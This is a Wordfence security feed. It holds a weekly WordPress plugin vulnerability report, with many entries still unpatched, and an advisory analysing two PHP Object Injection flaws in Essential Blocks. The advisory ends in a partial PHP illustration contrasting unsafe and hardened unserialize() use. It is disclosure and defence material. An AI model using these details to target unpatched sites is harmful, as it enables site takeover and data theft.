Wordfence Intelligence Weekly WordPress Vulnerability Report (September 11, 2023 to September 17, 2023)

Last week, there were 55 vulnerabilities disclosed in 46 WordPress Plugins and no WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 15 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data to make the internet more secure. That is why the Wordfence Intelligence user interface, vulnerability API and webhook notifications are completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report.

Click here to sign up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.


New Firewall Rules Deployed Last Week

The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.

The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our Premium, Care, and Response customers last week:

Wordfence Premium, Care, and Response customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30-day delay.


Total Unpatched & Patched Vulnerabilities Last Week

Patch Status Number of Vulnerabilities
Unpatched 16
Patched 39

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating Number of Vulnerabilities
Low Severity 0
Medium Severity 37
High Severity 16
Critical Severity 2

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) 18
Cross-Site Request Forgery (CSRF) 7
Missing Authorization 6
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) 5
Deserialization of Untrusted Data 5
Information Exposure 4
Authorization Bypass Through User-Controlled Key 3
Server-Side Request Forgery (SSRF) 2
Improper Control of Generation of Code (‘Code Injection’) 1
Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’) 1
Incorrect Privilege Assignment 1
Improper Authorization 1
Unverified Password Change 1

Researchers That Contributed to WordPress Security Last Week

Researcher Name Number of Vulnerabilities
Lana Codes (Wordfence Vulnerability Researcher) 20
foobar7 5
Marco Wotschka (Wordfence Vulnerability Researcher) 5
Yan&Co ApS 2
Vladislav Pokrovsky 2
Chloe Chamberland (Wordfence Vulnerability Researcher) 1
Nguyen Anh Tien 1
Do Xuan Trung 1
osama-hamad 1
Rafie Muhammad 1
Dmitrii Ignatyev 1
Alex Thomas (Wordfence Vulnerability Researcher) 1
teo23mal 1
David Anderson 1
Pablo Sanchez 1


Are you a security researcher who would like to be featured in our weekly vulnerability report? You can responsibly disclose your WordPress vulnerability discoveries to us and obtain a CVE ID through this form. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the Wordfence Intelligence leaderboard along with being mentioned in our weekly vulnerability report.


WordPress Plugins with Reported Vulnerabilities Last Week

Software Name Software Slug
10Web Map Builder for Google Maps wd-google-maps
Allow PHP in Posts and Pages allow-php-in-posts-and-pages
Awesome Weather Widget awesome-weather
BAN Users ban-users
Booking Calendar booking
Booking calendar, Appointment Booking System booking-calendar
Booster for WooCommerce woocommerce-jetpack
Checkout Field Editor woocommerce-checkout-field-editor
Comments – wpDiscuz wpdiscuz
Crayon Syntax Highlighter crayon-syntax-highlighter
DoLogin Security dologin
Dropbox Folder Share dropbox-folder-share
Enable Media Replace enable-media-replace
Essential Addons for Elementor essential-addons-for-elementor-lite
Essential Blocks Pro essential-blocks-pro
Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates essential-blocks
Feeds for YouTube (YouTube video, channel, and gallery plugin) feeds-for-youtube
File Manager Pro – Filester filester
Google Maps Plugin by Intergeo intergeo-maps
Horizontal scrolling announcement horizontal-scrolling-announcement
JQuery Accordion Menu Widget jquery-vertical-accordion-menu
Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation zero-bs-crm
Leyka leyka
Login with phone number login-with-phone-number
MapPress Maps for WordPress mappress-google-maps-for-wordpress
Migration, Backup, Staging – WPvivid wpvivid-backuprestore
MultiVendorX – MultiVendor Marketplace Solution For WooCommerce dc-woocommerce-multi-vendor
Page Builder: Pagelayer – Drag and Drop website builder pagelayer
Photospace Responsive Gallery photospace-responsive
PowerPress Podcasting plugin by Blubrry powerpress
Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress quiz-master-next
Read More & Accordion expand-maker
ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF shortpixel-image-optimiser
Simplr Registration Form Plus+ simplr-registration-form
Slimstat Analytics wp-slimstat
Testimonial Slider Shortcode testimonial-slider-shortcode
WP Customer Reviews wp-customer-reviews
WP User Control wp-user-control
WS Facebook Like Box Widget ws-facebook-likebox
Welcart e-Commerce usc-e-shop
WooCommerce woocommerce
WooCommerce Beta Tester woocommerce-beta-tester
WooCommerce CVR Payment Gateway woocommerce-cvr-payment-gateway
WooCommerce EAN Payment Gateway woocommerce-ean-payment-gateway
WooCommerce Subscription woocommerce-subscriptions
WordPress File Upload wp-file-upload
woocommerce-checkout-field-editor woocommerce-checkout-field-editor

Vulnerability Details

Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities.

Allow PHP in Posts and Pages <= 3.0.4 – Authenticated (Subscriber+) Remote Code Execution via Shortcode

Affected Software: Allow PHP in Posts and Pages
CVE ID: CVE-2023-4994
CVSS Score: 9.9 (Critical)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3d8b4bb6-3715-40c1-8140-7fcf874ccec3

Dropbox Folder Share <= 1.9.7 – Unauthenticated Local File Inclusion

Affected Software: Dropbox Folder Share
CVE ID: CVE-2023-4488
CVSS Score: 9.8 (Critical)
Researcher/s: Marco Wotschka
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/647a2f27-092a-4db1-932d-87ae8c2efcca

Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Blind SQL Injection via Shortcode

Affected Software: Slimstat Analytics
CVE ID: CVE-2023-4598
CVSS Score: 8.8 (High)
Researcher/s: Chloe Chamberland, Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/07c0f5a5-3455-4f06-b481-f4d678309c50

Welcart e-Commerce <= 2.8.21 – Authenticated(level_5+) SQL Injection via get_logs

Affected Software: Welcart e-Commerce
CVE ID: CVE Unknown
CVSS Score: 8.8 (High)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/35dadb9c-f0c6-4b74-bb31-5e9d504b3db5

Simplr Registration Form Plus+ <= 2.4.5 – Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change

Affected Software: Simplr Registration Form Plus+
CVE ID: CVE-2023-4213
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6ddf0452-3afe-4ada-bccc-30c818968a81

Login with phone number <= 1.4.8 – Cross-Site Request Forgery to User Password Change

Affected Software: Login with phone number
CVE ID: CVE-2023-4916
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/71083db7-377b-47a1-ac8b-83d8974a2654

Essential Addons for Elementor <= 5.8.8 – Authenticated (Contributor+) Privilege Escalation

Affected Software: Essential Addons for Elementor
CVE ID: CVE-2023-41955
CVSS Score: 8.8 (High)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8c13701e-424d-462f-b152-4dc5ad3ef197

BAN Users <= 1.5.3 – Missing Authorization to Authenticated (Subscriber+) Settings Update & Privilege Escalation

Affected Software: BAN Users
CVE ID: CVE-2023-4153
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/af6bd2db-47a4-4381-a881-d5f97a159f8d

Horizontal scrolling announcement <= 9.2 – Authenticated (Subscriber+) SQL Injection via Shortcode

Affected Software: Horizontal scrolling announcement
CVE ID: CVE-2023-4999
CVSS Score: 8.8 (High)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bf50922a-58a6-4ca4-80b7-cafb37b87216

File Manager Pro – Filester – <= 1.7.6 – Cross-Site Request Forgery to Arbitrary File Rename

Affected Software: File Manager Pro – Filester
CVE ID: CVE-2023-4827
CVSS Score: 8.8 (High)
Researcher/s: Dmitrii Ignatyev
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cfbc7af2-1e2c-4aaf-b73c-870f7519aff1

MultiVendorX <= 4.0.25 – Improper Authorization on REST Routes via ‘save_settings_permission’

Affected Software: MultiVendorX – MultiVendor Marketplace Solution For WooCommerce
CVE ID: CVE Unknown
CVSS Score: 8.6 (High)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/afd9046c-5b6a-411e-8e66-ff1ba60d7f9d

WPvivid Backup Plugin <= 0.9.90 – Missing Authorization via ‘start_staging’ and ‘get_staging_progress’

Affected Software: Migration, Backup, Staging – WPvivid
CVE ID: CVE-2023-41243
CVSS Score: 8.3 (High)
Researcher/s: Nguyen Anh Tien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/28e723ee-e99a-4ec4-b492-bfba04d27fd0

Essential Blocks <= 4.2.0 – Unauthenticated PHP Object Injection via products

Affected Software: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates
CVE ID: CVE-2023-4402
CVSS Score: 8.1 (High)
Researcher/s: Marco Wotschka
Patch Status: Patched

Essential Blocks <= 4.2.0 – Unauthenticated PHP Object Injection via queries

Affected Software: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates
CVE ID: CVE-2023-4386
CVSS Score: 8.1 (High)
Researcher/s: Marco Wotschka
Patch Status: Patched

Read More & Accordion <= 3.2.2 – Authenticated (Administrator+) PHP Object Injection

Affected Software: Read More & Accordion
CVE ID: CVE-2023-3392
CVSS Score: 7.2 (High)
Researcher/s: Do Xuan Trung
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/73ab9f95-05cc-47fc-bfcb-1787f6f80789

Booking calendar, Appointment Booking System <= 3.2.8 – Multiple Authenticated(Editor+) SQL Injection

Affected Software: Booking calendar, Appointment Booking System
CVE ID: CVE Unknown
CVSS Score: 7.2 (High)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/a02f4fc4-42ca-4f8e-9c28-bfa69644e7b6

Dropbox Folder Share <= 1.9.7 – Unauthenticated Server-Side Request Forgery via ‘link’

Affected Software: Dropbox Folder Share
CVE ID: CVE-2023-3025
CVSS Score: 7.2 (High)
Researcher/s: Alex Thomas
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d62bd2bd-db01-479f-89e4-8031d69a912f

WooCommerce Beta Tester < 2.2.4 – Authenticated (Administrator+) SQL Injection

Affected Software: WooCommerce Beta Tester
CVE ID: CVE Unknown
CVSS Score: 7.2 (High)
Researcher/s: teo23mal
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d6cbec61-cbe8-44a6-8cc8-8603393ed6b0

Enable Media Replace <= 4.1.2 – Authenticated(Editor+) PHP Object Injection

Affected Software: Enable Media Replace
CVE ID: CVE Unknown
CVSS Score: 6.6 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6e7e6445-c1c5-48a8-a76d-819f2db1efc2

ShortPixel Image Optimizer <= 5.4.1 – Authenticated(Editor+) PHP Object Injection

Affected Software: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF
CVE ID: CVE Unknown
CVSS Score: 6.6 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9f23bf62-6008-4a9c-a7ae-a2e513699684

Booking Calendar <= 9.7.3 – Unauthenticated Stored Cross-Site Scripting

Affected Software: Booking Calendar
CVE ID: CVE-2023-4620
CVSS Score: 6.5 (Medium)
Researcher/s: Pablo Sanchez
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f883823f-c225-4cd2-a0f6-39013476ed83

Testimonial Slider Shortcode <= 1.1.8 – Authenticated (Contributor+) Cross-Site Scripting Vulnerability via Shortcode

Affected Software: Testimonial Slider Shortcode
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/30cb1b8c-84ce-4401-9c30-775efb257fe6

Feeds for YouTube <= 2.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Feeds for YouTube (YouTube video, channel, and gallery plugin)
CVE ID: CVE-2023-4841
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/376e2638-a873-4142-ad7d-067ae3333709

Awesome Weather Widget <= 3.0.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Awesome Weather Widget
CVE ID: CVE-2023-4944
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3bf77988-370b-437f-83a0-18a147e3e087

Crayon Syntax Highlighter <= 2.8.4 – Authenticated (Contributor+) Server Side Request Forgery

Affected Software: Crayon Syntax Highlighter
CVE ID: CVE-2023-4893
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/527f75f1-6361-4e16-8ae4-d38ca4589811

WS Facebook Like Box Widget <= 5.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: WS Facebook Like Box Widget
CVE ID: CVE-2023-4963
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8bebc229-9d15-439f-a8df-f68455bc5193

Booster for WooCommerce <= 7.1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Booster for WooCommerce
CVE ID: CVE-2023-4945
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/981639a3-63c4-4b3f-827f-4d770bd44806

PowerPress <= 11.0.10 – Authenticated(Contributor+) Stored Cross-Site Scripting via Media URL

Affected Software: PowerPress Podcasting plugin by Blubrry
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ae8c888e-46ed-468f-a5d5-74a7f9d01a36

JQuery Accordion Menu Widget <= 3.1.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: JQuery Accordion Menu Widget
CVE ID: CVE-2023-4890
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b0cf3015-cdc9-4ac9-82f3-e9b4d1203e22

MapPress Maps for WordPress <= 2.88.4 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: MapPress Maps for WordPress
CVE ID: CVE-2023-4840
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c3d2c9a4-32f7-484f-86ce-a33ef1174b28

Google Maps Plugin by Intergeo <= 2.3.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Google Maps Plugin by Intergeo
CVE ID: CVE-2023-4887
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cb6d11ad-0983-4a4b-b52b-824eae8b8e3c

Horizontal scrolling announcement <= 9.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Horizontal scrolling announcement
CVE ID: CVE-2023-5001
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d4f60e8c-2745-4930-9101-914bd73c6e1c

Jetpack CRM <= 5.5.0 – Authenticated (Client+) Stored Cross-Site Scripting

Affected Software: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e1dbd0e2-8c6c-4127-b37c-269af3b7f71c

PageLayer <= 1.7.6 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Page Builder: Pagelayer – Drag and Drop website builder
CVE ID: CVE Unknown
CVSS Score: 6.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e34b6ae5-1370-4058-95dd-5686978ca45b

WooCommerce <= 7.8.2 – Sensitive Information Exposure

Affected Software: WooCommerce
CVE ID: CVE Unknown
CVSS Score: 5.3 (Medium)
Researcher/s: osama-hamad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7b2d1879-c337-41c9-9f47-f9c2fe8e5928

wpDiscuz <= 7.6.3 – Insecure Direct Object Reference to Post Rating Increase/Decrease

Affected Software: Comments – wpDiscuz
CVE ID: CVE-2023-3998
CVSS Score: 5.3 (Medium)
Researcher/s: Vladislav Pokrovsky
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9d09bdab-ffab-44cc-bba2-821b21a8e343

wpDiscuz <= 7.6.3 – Insecure Direct Object Reference to Comment Rating Increase/Decrease

Affected Software: Comments – wpDiscuz
CVE ID: CVE-2023-3869
CVSS Score: 5.3 (Medium)
Researcher/s: Vladislav Pokrovsky
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b30ac1b0-eae2-4194-bf8e-ae73b4236965

Leyka <= 3.30.3 – Authenticated (Subscriber+) Sensitive Information Exposure

Affected Software: Leyka
CVE ID: CVE-2023-4917
CVSS Score: 5.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/dcd24b90-94ff-4625-8e3e-9c90e38683f9

WP User Control <= 1.5.3 – Insecure Password Reset Mechanism

Affected Software: WP User Control
CVE ID: CVE-2023-4915
CVSS Score: 5.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f4ca1736-7b99-49db-9367-586dbc14df41

WooCommerce <= 7.0.0 – Authenticated(Shop Manager+) Sensitive Information Exposure

Affected Software: WooCommerce
CVE ID: CVE Unknown
CVSS Score: 4.9 (Medium)
Researcher/s: David Anderson
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f1efcff5-3af6-4c44-9654-b917523419aa

WordPress File Upload <= 4.23.2 – Authenticated(Administrator+) Stored Cross-Site Scripting

Affected Software: WordPress File Upload
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/0e1915d9-8ea9-4ab2-9746-3c49bc0bd7c8

Jetpack CRM <= 5.5.0 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/32f2fc21-165c-483f-ab81-48d8f221e4be

Photospace Responsive <= 2.1.1 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Photospace Responsive Gallery
CVE ID: CVE-2023-4271
CVSS Score: 4.4 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3bc98896-6ff9-40de-ace2-2ca331c2a44a

Migration, Backup, Staging – WPvivid <= 0.9.90 – Authenticated(Administrator+) Stored Cross-Site Scripting

Affected Software: Migration, Backup, Staging – WPvivid
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b6d3ede8-465e-4588-b8ef-36bcd1850ec3

WP Customer Reviews <= 3.6.6 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: WP Customer Reviews
CVE ID: CVE-2023-4648
CVSS Score: 4.4 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f81950be-de32-4fa1-94fe-42667414fe2d

WooCommerce Subscription < 4.6.0 – Cross-Site Request Forgery

Affected Software: WooCommerce Subscription
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/08a98c08-cddc-4bc3-bc07-15d084070abd

DoLogin Security <= 3.7 – Missing Authorization on Dashboard Widget

Affected Software: DoLogin Security
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/24e2b96c-665f-4616-ac99-1a2b1b0a9ccd

WooCommerce EAN Payment Gateway < 6.1.0 – Missing Authorization to Authenticated (Contributor+) EAN Update

Affected Software: WooCommerce EAN Payment Gateway
CVE ID: CVE-2023-4947
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes, Yan&Co ApS
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/2760b183-3c15-4f0e-b72f-7c0333f9d4b6

Quiz And Survey Master <= 8.1.15 – Cross-Site Request Forgery via ‘display_results’

Affected Software: Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/32173d38-7f85-4e0c-9b4c-38bee2783d77

10Web Map Builder for Google Maps <= 1.0.73 – Cross-Site Request Forgery to Notice Dismissal

Affected Software: 10Web Map Builder for Google Maps
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4be81ba0-c678-4234-b63e-da9813817bef

10Web Map Builder for Google Maps <= 1.0.73 – Missing Authorization to Notice Dismissal

Affected Software: 10Web Map Builder for Google Maps
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/63666c16-9f68-4a27-b163-4c25f0a7589e

Checkout Field Editor (Premium) < 1.7.5 – Cross-Site Request Forgery

Affected Software: woocommerce-checkout-field-editor
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/a4647210-ba7e-4233-83d6-12572213f5fb

Booster for WooCommerce <= 7.1.0 – Authenticated (Subscriber+) Information Disclosure via Shortcode

Affected Software: Booster for WooCommerce
CVE ID: CVE-2023-4796
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/a4cd49b2-ff93-4582-906b-b690d8472c38

Checkout Field Editor <= 1.7.4 – Cross-Site Request Forgery to Checkout Fields Update

Affected Software: Checkout Field Editor
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: foobar7
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ad430706-749f-4582-af07-6c543b8d5aad

WooCommerce CVR Payment Gateway < 6.1.0 – Missing Authorization to Authenticated (Contributor+) CVR Update

Affected Software: WooCommerce CVR Payment Gateway
CVE ID: CVE-2023-4948
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes, Yan&Co ApS
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f72ba0e2-a9c4-43b0-a01f-185554090162

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us using our CVE Request form, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

Click here to sign up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (September 11, 2023 to September 17, 2023) appeared first on Wordfence.

Two PHP Object Injection Vulnerabilities Fixed in Essential Blocks

On August 18, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two PHP Object Injection vulnerabilities in the Essential Blocks plugin for WordPress, a plugin with over 100,000 installations.

We received a response three days later and sent over our full disclosure on August 23, 2023. A patched version of the free plugin, 4.2.1, was released on August 29, 2023 with version 1.1.1 for the Pro version released the same day.

We issued a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers on August 18, 2023. Sites still running the free version of Wordfence received the same protection on September 17, 2023. We recommend that all Wordfence users update to the patched version, 4.2.1 (1.1.1 for Pro), as soon as possible, as this will entirely eliminate the vulnerabilities.

Vulnerability Summary from Wordfence Intelligence

Description: Insecure Deserialization/PHP Object Injection via queries
Affected Plugin: Essential Blocks, Essential Blocks Pro
Plugin slug: essential-blocks, essential-blocks-pro
Vendor: WPDeveloper
Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)
CVE ID: CVE-2023-4386
CVSS score: 8.1 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher: Marco Wotschka
Fully Patched Version: 4.2.1 & 1.1.1

The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_posts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

Description: Insecure Deserialization/PHP Object Injection via products
Affected Plugin: Essential Blocks, Essential Blocks Pro
Plugin slug: essential-blocks
Vendor: WPDeveloper
Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)
CVE ID: CVE-2023-4402
CVSS score: 8.1 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher: Marco Wotschka
Fully Patched Version: 4.2.1 & 1.1.1

The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_products function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

Technical Analysis

The Essential Blocks plugin provides more than 40 blocks to its users, including sliders, buttons, pricing tables, maps and others. An API is provided to query for posts and products via the queries and products API endpoints, which do not require authentication.

Unfortunately, query data and attributes were passed in PHP’s serialized string format and were subsequently unserialized by the functions get_posts (for the queries endpoint) and get_products (for the products endpoint) in /includes/API/PostBlock.php and /includes/API/Product.php, respectively.

get_posts function

get_products function

Attackers could utilize this to inject a PHP object with properties of their choosing. The presence of a PHP POP chain can make it possible for an attacker to execute arbitrary code, create and delete files and potentially ultimately take over a vulnerable site. Fortunately, no POP chain is present in the Essential Blocks plugin, which means an attacker would require another plugin or theme installed on the vulnerable site with a POP chain present in order to fully exploit these vulnerabilities. It is worth mentioning that POP chains can sometimes be found in popular plugins and libraries which include destructor methods that perform cleanup tasks when an Object is destroyed or deserialized.

Despite the lack of a POP chain in the Essential Blocks plugin itself, and the complexity involved in exploiting these types of vulnerabilities, a successful attack often leads to severe consequences. We explain how PHP Object Injections work in this blog post, if you are interested in finding out more about their inner workings.
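The following PHP is an added illustration of the pattern described above and is not code from the Essential Blocks plugin. It shows the unsafe shape (unserialize on request-supplied attributes) beside two hardened forms, and uses a harmless stand-in class with a destructor to show why an object reaching unserialize matters even when the plugin itself has no POP chain. The class name, function names and the serialized payload are all constructed for this example; the plugin's real handlers are not reproduced here.

```php
<?php
declare(strict_types=1);

// Added example, not the Essential Blocks plugin's code. Function and class
// names are hypothetical; the payload below is constructed for this demo.
// Requires PHP 8.0+ (for the "mixed" return type).

// A harmless stand-in for a "gadget" class of the kind the text mentions:
// some other plugin or library on the site defines a class whose destructor
// performs cleanup. Here the destructor only records that it ran.
final class CleanupHelper
{
    public static array $log = [];
    public string $path = '';

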